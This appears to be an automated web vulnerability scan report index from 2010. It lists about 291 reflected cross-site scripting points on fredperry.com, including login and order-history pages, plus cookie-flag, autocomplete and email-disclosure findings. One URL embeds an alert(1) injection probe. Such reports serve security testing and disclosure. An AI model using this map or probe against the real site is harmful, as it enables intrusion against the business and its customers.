Report generated by Hoyt LLC Research at Tue Nov 09 18:42:29 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Loading

1. Cross-site scripting (reflected)

1.1. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 1]

1.2. http://www.fredperry.com/aboutus/careers/ [REST URL parameter 2]

1.3. http://www.fredperry.com/aboutus/careers/ [name of an arbitrarily supplied request parameter]

1.4. http://www.fredperry.com/aboutus/security/ [REST URL parameter 1]

1.5. http://www.fredperry.com/aboutus/security/ [REST URL parameter 2]

1.6. http://www.fredperry.com/aboutus/security/ [name of an arbitrarily supplied request parameter]

1.7. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 1]

1.8. http://www.fredperry.com/aboutus/terms/ [REST URL parameter 2]

1.9. http://www.fredperry.com/aboutus/terms/ [name of an arbitrarily supplied request parameter]

1.10. http://www.fredperry.com/accessories/ [REST URL parameter 1]

1.11. http://www.fredperry.com/accessories/ [name of an arbitrarily supplied request parameter]

1.12. http://www.fredperry.com/accessories/men/ [REST URL parameter 1]

1.13. http://www.fredperry.com/accessories/men/ [REST URL parameter 2]

1.14. http://www.fredperry.com/accessories/men/ [name of an arbitrarily supplied request parameter]

1.15. http://www.fredperry.com/accessories/women/ [REST URL parameter 1]

1.16. http://www.fredperry.com/accessories/women/ [REST URL parameter 2]

1.17. http://www.fredperry.com/accessories/women/ [name of an arbitrarily supplied request parameter]

1.18. http://www.fredperry.com/arcade/ [REST URL parameter 1]

1.19. http://www.fredperry.com/arcade/ [name of an arbitrarily supplied request parameter]

1.20. http://www.fredperry.com/bags/ [REST URL parameter 1]

1.21. http://www.fredperry.com/bags/ [name of an arbitrarily supplied request parameter]

1.22. http://www.fredperry.com/bags/men/ [REST URL parameter 1]

1.23. http://www.fredperry.com/bags/men/ [REST URL parameter 2]

1.24. http://www.fredperry.com/bags/men/ [name of an arbitrarily supplied request parameter]

1.25. http://www.fredperry.com/bags/women/ [REST URL parameter 1]

1.26. http://www.fredperry.com/bags/women/ [REST URL parameter 2]

1.27. http://www.fredperry.com/bags/women/ [name of an arbitrarily supplied request parameter]

1.28. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 1]

1.29. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 2]

1.30. http://www.fredperry.com/catalogsearch/ajax/suggest/ [REST URL parameter 3]

1.31. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 1]

1.32. http://www.fredperry.com/catalogsearch/result/ [REST URL parameter 2]

1.33. http://www.fredperry.com/checkout/cart/ [REST URL parameter 1]

1.34. http://www.fredperry.com/checkout/cart/ [REST URL parameter 2]

1.35. http://www.fredperry.com/checkout/cart/ [name of an arbitrarily supplied request parameter]

1.36. http://www.fredperry.com/contacts/ [REST URL parameter 1]

1.37. http://www.fredperry.com/contacts/ [name of an arbitrarily supplied request parameter]

1.38. http://www.fredperry.com/customercare/ [REST URL parameter 1]

1.39. http://www.fredperry.com/customercare/ [name of an arbitrarily supplied request parameter]

1.40. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 1]

1.41. http://www.fredperry.com/customercare/delivery/ [REST URL parameter 2]

1.42. http://www.fredperry.com/customercare/delivery/ [name of an arbitrarily supplied request parameter]

1.43. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 1]

1.44. http://www.fredperry.com/customercare/deliverylate/ [REST URL parameter 2]

1.45. http://www.fredperry.com/customercare/deliverylate/ [name of an arbitrarily supplied request parameter]

1.46. http://www.fredperry.com/customercare/faq/ [REST URL parameter 1]

1.47. http://www.fredperry.com/customercare/faq/ [REST URL parameter 2]

1.48. http://www.fredperry.com/customercare/faq/ [name of an arbitrarily supplied request parameter]

1.49. http://www.fredperry.com/customercare/information/ [REST URL parameter 1]

1.50. http://www.fredperry.com/customercare/information/ [REST URL parameter 2]

1.51. http://www.fredperry.com/customercare/information/ [name of an arbitrarily supplied request parameter]

1.52. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 1]

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]

1.66. http://www.fredperry.com/heritage/ [REST URL parameter 1]

1.67. http://www.fredperry.com/heritage/ [name of an arbitrarily supplied request parameter]

1.68. http://www.fredperry.com/home/ [REST URL parameter 1]

1.69. http://www.fredperry.com/home/ [name of an arbitrarily supplied request parameter]

1.70. http://www.fredperry.com/js/index.php [REST URL parameter 1]

1.71. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 1]

1.72. http://www.fredperry.com/kids/kidswear/ [REST URL parameter 2]

1.73. http://www.fredperry.com/kids/kidswear/ [name of an arbitrarily supplied request parameter]

1.74. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 1]

1.75. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [REST URL parameter 2]

1.76. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/ [name of an arbitrarily supplied request parameter]

1.77. http://www.fredperry.com/limited-edition/ [REST URL parameter 1]

1.78. http://www.fredperry.com/limited-edition/ [name of an arbitrarily supplied request parameter]

1.79. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 1]

1.80. http://www.fredperry.com/limited-edition/men/ [REST URL parameter 2]

1.81. http://www.fredperry.com/limited-edition/men/ [name of an arbitrarily supplied request parameter]

1.82. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 1]

1.83. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 2]

1.84. http://www.fredperry.com/limited-edition/men/accessories/ [REST URL parameter 3]

1.85. http://www.fredperry.com/limited-edition/men/accessories/ [name of an arbitrarily supplied request parameter]

1.86. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 1]

1.87. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 2]

1.88. http://www.fredperry.com/limited-edition/men/bags/ [REST URL parameter 3]

1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]

1.90. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 1]

1.91. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 2]

1.92. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [REST URL parameter 3]

1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]

1.94. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 1]

1.95. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 2]

1.96. http://www.fredperry.com/limited-edition/men/british-collectables/ [REST URL parameter 3]

1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]

1.98. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 1]

1.99. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 2]

1.100. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [REST URL parameter 3]

1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]

1.102. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 1]

1.103. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 2]

1.104. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [REST URL parameter 3]

1.105. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [SID parameter]

1.106. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/ [name of an arbitrarily supplied request parameter]

1.107. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 1]

1.108. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 2]

1.109. http://www.fredperry.com/limited-edition/men/footwear/ [REST URL parameter 3]

1.110. http://www.fredperry.com/limited-edition/men/footwear/ [name of an arbitrarily supplied request parameter]

1.111. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 1]

1.112. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 2]

1.113. http://www.fredperry.com/limited-edition/men/jackets/ [REST URL parameter 3]

1.114. http://www.fredperry.com/limited-edition/men/jackets/ [name of an arbitrarily supplied request parameter]

1.115. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 1]

1.116. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 2]

1.117. http://www.fredperry.com/limited-edition/men/knitwear/ [REST URL parameter 3]

1.118. http://www.fredperry.com/limited-edition/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.119. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 1]

1.120. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 2]

1.121. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [REST URL parameter 3]

1.122. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/ [name of an arbitrarily supplied request parameter]

1.123. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 1]

1.124. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 2]

1.125. http://www.fredperry.com/limited-edition/men/new-styles/ [REST URL parameter 3]

1.126. http://www.fredperry.com/limited-edition/men/new-styles/ [name of an arbitrarily supplied request parameter]

1.127. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 1]

1.128. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 2]

1.129. http://www.fredperry.com/limited-edition/men/shirts/ [REST URL parameter 3]

1.130. http://www.fredperry.com/limited-edition/men/shirts/ [name of an arbitrarily supplied request parameter]

1.131. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 1]

1.132. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 2]

1.133. http://www.fredperry.com/limited-edition/men/shorts/ [REST URL parameter 3]

1.134. http://www.fredperry.com/limited-edition/men/shorts/ [name of an arbitrarily supplied request parameter]

1.135. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 1]

1.136. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 2]

1.137. http://www.fredperry.com/limited-edition/men/trousers/ [REST URL parameter 3]

1.138. http://www.fredperry.com/limited-edition/men/trousers/ [name of an arbitrarily supplied request parameter]

1.139. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 1]

1.140. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 2]

1.141. http://www.fredperry.com/limited-edition/men/woven-shirts/ [REST URL parameter 3]

1.142. http://www.fredperry.com/limited-edition/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.143. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 1]

1.144. http://www.fredperry.com/limited-edition/women/ [REST URL parameter 2]

1.145. http://www.fredperry.com/limited-edition/women/ [name of an arbitrarily supplied request parameter]

1.146. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 1]

1.147. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 2]

1.148. http://www.fredperry.com/limited-edition/women/accessories/ [REST URL parameter 3]

1.149. http://www.fredperry.com/limited-edition/women/accessories/ [name of an arbitrarily supplied request parameter]

1.150. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 1]

1.151. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 2]

1.152. http://www.fredperry.com/limited-edition/women/bags/ [REST URL parameter 3]

1.153. http://www.fredperry.com/limited-edition/women/bags/ [name of an arbitrarily supplied request parameter]

1.154. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 1]

1.155. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 2]

1.156. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [REST URL parameter 3]

1.157. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/ [name of an arbitrarily supplied request parameter]

1.158. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 1]

1.159. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 2]

1.160. http://www.fredperry.com/limited-edition/women/collaboration/ [REST URL parameter 3]

1.161. http://www.fredperry.com/limited-edition/women/collaboration/ [name of an arbitrarily supplied request parameter]

1.162. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 1]

1.163. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 2]

1.164. http://www.fredperry.com/limited-edition/women/dresses/ [REST URL parameter 3]

1.165. http://www.fredperry.com/limited-edition/women/dresses/ [name of an arbitrarily supplied request parameter]

1.166. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 1]

1.167. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 2]

1.168. http://www.fredperry.com/limited-edition/women/footwear/ [REST URL parameter 3]

1.169. http://www.fredperry.com/limited-edition/women/footwear/ [name of an arbitrarily supplied request parameter]

1.170. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 1]

1.171. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 2]

1.172. http://www.fredperry.com/limited-edition/women/jackets/ [REST URL parameter 3]

1.173. http://www.fredperry.com/limited-edition/women/jackets/ [name of an arbitrarily supplied request parameter]

1.174. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 1]

1.175. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 2]

1.176. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [REST URL parameter 3]

1.177. http://www.fredperry.com/limited-edition/women/jessica-ogden/ [name of an arbitrarily supplied request parameter]

1.178. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 1]

1.179. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 2]

1.180. http://www.fredperry.com/limited-edition/women/knitwear/ [REST URL parameter 3]

1.181. http://www.fredperry.com/limited-edition/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.182. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 1]

1.183. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 2]

1.184. http://www.fredperry.com/limited-edition/women/new-styles/ [REST URL parameter 3]

1.185. http://www.fredperry.com/limited-edition/women/new-styles/ [name of an arbitrarily supplied request parameter]

1.186. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 1]

1.187. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 2]

1.188. http://www.fredperry.com/limited-edition/women/shirts/ [REST URL parameter 3]

1.189. http://www.fredperry.com/limited-edition/women/shirts/ [name of an arbitrarily supplied request parameter]

1.190. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 1]

1.191. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 2]

1.192. http://www.fredperry.com/limited-edition/women/shorts/ [REST URL parameter 3]

1.193. http://www.fredperry.com/limited-edition/women/shorts/ [name of an arbitrarily supplied request parameter]

1.194. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 1]

1.195. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 2]

1.196. http://www.fredperry.com/limited-edition/women/skirts/ [REST URL parameter 3]

1.197. http://www.fredperry.com/limited-edition/women/skirts/ [name of an arbitrarily supplied request parameter]

1.198. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 1]

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]

1.213. http://www.fredperry.com/men/knitwear/ [name of an arbitrarily supplied request parameter]

1.214. http://www.fredperry.com/men/shirts/ [REST URL parameter 1]

1.215. http://www.fredperry.com/men/shirts/ [REST URL parameter 2]

1.216. http://www.fredperry.com/men/shirts/ [name of an arbitrarily supplied request parameter]

1.217. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 1]

1.218. http://www.fredperry.com/men/t-shirts/ [REST URL parameter 2]

1.219. http://www.fredperry.com/men/t-shirts/ [name of an arbitrarily supplied request parameter]

1.220. http://www.fredperry.com/men/tennis/ [REST URL parameter 1]

1.221. http://www.fredperry.com/men/tennis/ [REST URL parameter 2]

1.222. http://www.fredperry.com/men/tennis/ [name of an arbitrarily supplied request parameter]

1.223. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 1]

1.224. http://www.fredperry.com/men/track-jackets/ [REST URL parameter 2]

1.225. http://www.fredperry.com/men/track-jackets/ [name of an arbitrarily supplied request parameter]

1.226. http://www.fredperry.com/men/trousers/ [REST URL parameter 1]

1.227. http://www.fredperry.com/men/trousers/ [REST URL parameter 2]

1.228. http://www.fredperry.com/men/trousers/ [name of an arbitrarily supplied request parameter]

1.229. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 1]

1.230. http://www.fredperry.com/men/woven-shirts/ [REST URL parameter 2]

1.231. http://www.fredperry.com/men/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.232. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 1]

1.233. http://www.fredperry.com/productinfo/clothingsizes/ [REST URL parameter 2]

1.234. http://www.fredperry.com/productinfo/clothingsizes/ [name of an arbitrarily supplied request parameter]

1.235. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 1]

1.236. http://www.fredperry.com/productinfo/footwearsizes/ [REST URL parameter 2]

1.237. http://www.fredperry.com/productinfo/footwearsizes/ [name of an arbitrarily supplied request parameter]

1.238. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 1]

1.239. http://www.fredperry.com/productinfo/garmentcare/ [REST URL parameter 2]

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]

1.253. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 2]

1.254. http://www.fredperry.com/women/amy-winehouse/ [name of an arbitrarily supplied request parameter]

1.255. http://www.fredperry.com/women/dresses/ [REST URL parameter 1]

1.256. http://www.fredperry.com/women/dresses/ [REST URL parameter 2]

1.257. http://www.fredperry.com/women/dresses/ [name of an arbitrarily supplied request parameter]

1.258. http://www.fredperry.com/women/jackets/ [REST URL parameter 1]

1.259. http://www.fredperry.com/women/jackets/ [REST URL parameter 2]

1.260. http://www.fredperry.com/women/jackets/ [name of an arbitrarily supplied request parameter]

1.261. http://www.fredperry.com/women/knitwear/ [REST URL parameter 1]

1.262. http://www.fredperry.com/women/knitwear/ [REST URL parameter 2]

1.263. http://www.fredperry.com/women/knitwear/ [name of an arbitrarily supplied request parameter]

1.264. http://www.fredperry.com/women/shirts/ [REST URL parameter 1]

1.265. http://www.fredperry.com/women/shirts/ [REST URL parameter 2]

1.266. http://www.fredperry.com/women/shirts/ [name of an arbitrarily supplied request parameter]

1.267. http://www.fredperry.com/women/skirts/ [REST URL parameter 1]

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

1.282. https://www.fredperry.com/customer/account/ [REST URL parameter 1]

1.283. https://www.fredperry.com/customer/account/ [REST URL parameter 2]

1.284. https://www.fredperry.com/customer/account/login/ [REST URL parameter 1]

1.285. https://www.fredperry.com/customer/account/login/ [REST URL parameter 2]

1.286. https://www.fredperry.com/customer/account/login/ [REST URL parameter 3]

1.287. https://www.fredperry.com/customer/account/login/ [name of an arbitrarily supplied request parameter]

1.288. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/ [name of an arbitrarily supplied request parameter]

1.289. https://www.fredperry.com/sales/order/history/ [REST URL parameter 1]

1.290. https://www.fredperry.com/sales/order/history/ [REST URL parameter 2]

1.291. https://www.fredperry.com/sales/order/history/ [REST URL parameter 3]

2. Password field with autocomplete enabled

3. SSL cookie without secure flag set

3.1. https://www.fredperry.com/customer/account/

3.2. https://www.fredperry.com/customer/account/login/

3.3. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

3.4. https://www.fredperry.com/sales/order/history/

4. Cross-domain Referer leakage

5. Cross-domain script include

6. Cookie without HttpOnly flag set

6.1. http://www.fredperry.com/aboutus/careers/

6.2. http://www.fredperry.com/aboutus/security/

6.3. http://www.fredperry.com/aboutus/terms/

6.4. http://www.fredperry.com/accessories/

6.5. http://www.fredperry.com/accessories/men/

6.6. http://www.fredperry.com/accessories/women/

6.7. http://www.fredperry.com/arcade/

6.8. http://www.fredperry.com/bags/

6.9. http://www.fredperry.com/bags/men/

6.10. http://www.fredperry.com/bags/women/

6.11. http://www.fredperry.com/catalogsearch/ajax/suggest/

6.12. http://www.fredperry.com/catalogsearch/result/

6.13. http://www.fredperry.com/checkout/cart/

6.14. http://www.fredperry.com/contacts/

6.15. http://www.fredperry.com/customercare/

6.16. http://www.fredperry.com/customercare/delivery/

6.17. http://www.fredperry.com/customercare/deliverylate/

6.18. http://www.fredperry.com/customercare/faq/

6.19. http://www.fredperry.com/customercare/information/

6.20. http://www.fredperry.com/customercare/ordertracking/

6.21. http://www.fredperry.com/customercare/returns/

6.22. http://www.fredperry.com/footwear/

6.23. http://www.fredperry.com/footwear/men/

6.24. http://www.fredperry.com/footwear/women/

6.25. http://www.fredperry.com/heritage/

6.26. http://www.fredperry.com/home/

6.27. http://www.fredperry.com/js/index.php

6.28. http://www.fredperry.com/kids/kidswear/

6.29. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

6.30. http://www.fredperry.com/limited-edition/

6.31. http://www.fredperry.com/limited-edition/men/

6.32. http://www.fredperry.com/limited-edition/men/accessories/

6.33. http://www.fredperry.com/limited-edition/men/bags/

6.34. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

6.35. http://www.fredperry.com/limited-edition/men/british-collectables/

6.36. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

6.37. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

6.38. http://www.fredperry.com/limited-edition/men/footwear/

6.39. http://www.fredperry.com/limited-edition/men/jackets/

6.40. http://www.fredperry.com/limited-edition/men/knitwear/

6.41. http://www.fredperry.com/limited-edition/men/liberty-blank-canvas/

6.42. http://www.fredperry.com/limited-edition/men/new-styles/

6.43. http://www.fredperry.com/limited-edition/men/shirts/

6.44. http://www.fredperry.com/limited-edition/men/shorts/

6.45. http://www.fredperry.com/limited-edition/men/trousers/

6.46. http://www.fredperry.com/limited-edition/men/woven-shirts/

6.47. http://www.fredperry.com/limited-edition/women/

6.48. http://www.fredperry.com/limited-edition/women/accessories/

6.49. http://www.fredperry.com/limited-edition/women/bags/

6.50. http://www.fredperry.com/limited-edition/women/blank-canvas-ann-sofie-back/

6.51. http://www.fredperry.com/limited-edition/women/collaboration/

6.52. http://www.fredperry.com/limited-edition/women/dresses/

6.53. http://www.fredperry.com/limited-edition/women/footwear/

6.54. http://www.fredperry.com/limited-edition/women/jackets/

6.55. http://www.fredperry.com/limited-edition/women/jessica-ogden/

6.56. http://www.fredperry.com/limited-edition/women/knitwear/

6.57. http://www.fredperry.com/limited-edition/women/new-styles/

6.58. http://www.fredperry.com/limited-edition/women/shirts/

6.59. http://www.fredperry.com/limited-edition/women/shorts/

6.60. http://www.fredperry.com/limited-edition/women/skirts/

6.61. http://www.fredperry.com/limited-edition/women/trousers/

6.62. http://www.fredperry.com/limited-edition/women/woven-shirts/

6.63. http://www.fredperry.com/men/

6.64. http://www.fredperry.com/men/jackets/

6.65. http://www.fredperry.com/men/knitwear/

6.66. http://www.fredperry.com/men/shirts/

6.67. http://www.fredperry.com/men/t-shirts/

6.68. http://www.fredperry.com/men/tennis/

6.69. http://www.fredperry.com/men/track-jackets/

6.70. http://www.fredperry.com/men/trousers/

6.71. http://www.fredperry.com/men/woven-shirts/

6.72. http://www.fredperry.com/productinfo/clothingsizes/

6.73. http://www.fredperry.com/productinfo/footwearsizes/

6.74. http://www.fredperry.com/productinfo/garmentcare/

6.75. http://www.fredperry.com/sale/

6.76. http://www.fredperry.com/shops/

6.77. http://www.fredperry.com/site-map/

6.78. http://www.fredperry.com/skin/frontend/default/default/css/catalogue.css

6.79. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

6.80. http://www.fredperry.com/skin/frontend/default/default/css/fp_style.css

6.81. http://www.fredperry.com/skin/frontend/default/default/css/generalpages.css

6.82. http://www.fredperry.com/skin/frontend/default/default/css/gs_960.css

6.83. http://www.fredperry.com/skin/frontend/default/default/css/gs_reset.css

6.84. http://www.fredperry.com/skin/frontend/default/default/css/gs_text.css

6.85. http://www.fredperry.com/skin/frontend/default/default/css/payment.css

6.86. http://www.fredperry.com/skin/frontend/default/default/css/print.css

6.87. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

6.88. http://www.fredperry.com/women/

6.89. http://www.fredperry.com/women/amy-winehouse-landing/

6.90. http://www.fredperry.com/women/amy-winehouse/

6.91. http://www.fredperry.com/women/dresses/

6.92. http://www.fredperry.com/women/jackets/

6.93. http://www.fredperry.com/women/knitwear/

6.94. http://www.fredperry.com/women/shirts/

6.95. http://www.fredperry.com/women/skirts/

6.96. http://www.fredperry.com/women/t-shirts/

6.97. http://www.fredperry.com/women/tennis/

6.98. http://www.fredperry.com/women/trousers/

6.99. http://www.fredperry.com/women/woven-shirts/

6.100. https://www.fredperry.com/customer/account/

6.101. https://www.fredperry.com/customer/account/login/

6.102. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

6.103. https://www.fredperry.com/sales/order/history/

7. Email addresses disclosed

7.1. http://www.fredperry.com/aboutus/careers/

7.2. http://www.fredperry.com/customercare/deliverylate/

7.3. http://www.fredperry.com/customercare/faq/

7.4. http://www.fredperry.com/customercare/returns/

7.5. http://www.fredperry.com/js/index.php

7.6. http://www.fredperry.com/shops/

7.7. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

7.8. http://www.fredperry.com/skin/frontend/default/default/css/print.css

7.9. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

7.10. https://www.fredperry.com/js/index.php

7.11. https://www.fredperry.com/skin/frontend/default/default/css/clears.css

